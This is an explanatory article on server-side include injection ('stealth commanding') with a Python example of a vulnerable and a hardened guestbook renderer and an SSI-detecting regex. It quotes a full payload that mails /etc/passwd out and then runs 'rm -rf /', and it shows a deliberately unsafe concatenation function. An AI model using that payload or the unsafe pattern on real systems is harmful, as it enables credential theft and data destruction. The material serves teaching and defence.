Stealth commanding is a set of techniques that allow attackers to exploit parsing problems in server-side scripts in order to change the code executed by the server. It is primarily used to execute operating system commands, allowing complete takeover of the server.
Stealth commanding enables attackers to execute arbitrary system-level commands. Likely targets are server-side includes, parsed scripts, CGIs (such as Perl scripts), code that takes input and turns it into OS commands, and anything that takes parameters and turns them into parsed protocols.
Most scripting languages used for CGIs simply chain strings together when receiving parameters. On many occasions these scripts rely on OS commands and are therefore relatively easy to exploit. The most common type of such scripts is Perl CGIs.
Server-side includes are an old technology, used in the past to provide minimal server-side scripting capabilities (commonly appearing in .SHTML files), and they are still supported by many Web servers. The following server-side include example builds the header and footer sections of a Web page:
<!--#include file="header.html" -->
<!--#include file="footer.html" -->
Include files are part of the HTML code that describes a page. If they are combined with user-supplied dynamic data, include files can become malicious: an attacker can inject dangerous server-side include tags, which will later be parsed by the server-side includes parser. For example, consider the following input for a bulletin board message:
Hi Kevin, I love the guestbook!
<!--#exec cmd="mail -s 'Ha Ha' email@example.com </etc/passwd; rm -rf /"-->
If the user's message is written to an HTML file that is subsequently parsed for server-side includes, the command will be executed each time the page is loaded: an email containing the "passwd" file will be sent to the attacker, and the computer will be erased.
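The guestbook scenario above, as an added example that is not part of the original page: the unsafe concatenation that lets a submitted message reach the SSI parser as markup, beside the hardened version that HTML-escapes user text, plus a check that flags any SSI directive in submitted input (not only #exec). The guestbook entries and the page assembly are constructed for this example.

```python
import html
import re

# Constructed sample guestbook entries (assumed input; not from the original page).
BENIGN = "Hi Kevin, I love the guestbook!"
SSI_ATTEMPT = 'Hi Kevin!\n<!--#echo var="DATE_LOCAL"-->'

# Matches any SSI directive opener such as <!--#include, <!--#exec, <!--#echo.
SSI_DIRECTIVE = re.compile(r"<!--\s*#\s*[a-z]+", re.IGNORECASE)


def contains_ssi_directive(text: str) -> bool:
    """Detection: flag submitted input that carries a server-side include directive."""
    return SSI_DIRECTIVE.search(text) is not None


def render_entry_vulnerable(message: str) -> str:
    """The unsafe pattern described in the text: raw concatenation of user text
    into a page the server will later parse for SSI directives."""
    return "<p>" + message + "</p>\n"


def render_entry_hardened(message: str) -> str:
    """Escape HTML metacharacters so '<!--#' can never reach the SSI parser as
    markup; readers still see the message text verbatim."""
    return "<p>" + html.escape(message, quote=True) + "</p>\n"


def build_page(entries, renderer) -> str:
    """Assemble the guestbook page. The header/footer includes are the page's
    own trusted SSI usage; user content must not be able to add more."""
    body = "".join(renderer(entry) for entry in entries)
    return ('<!--#include file="header.html" -->\n'
            + body
            + '<!--#include file="footer.html" -->\n')


def count_ssi_directives(page: str) -> int:
    """Number of SSI directives the server would parse in the finished page;
    a correct guestbook page contains exactly the two trusted includes."""
    return len(SSI_DIRECTIVE.findall(page))
```

With the vulnerable renderer the assembled page carries three directives (two trusted includes plus the injected one); with the hardened renderer it carries only the two trusted includes.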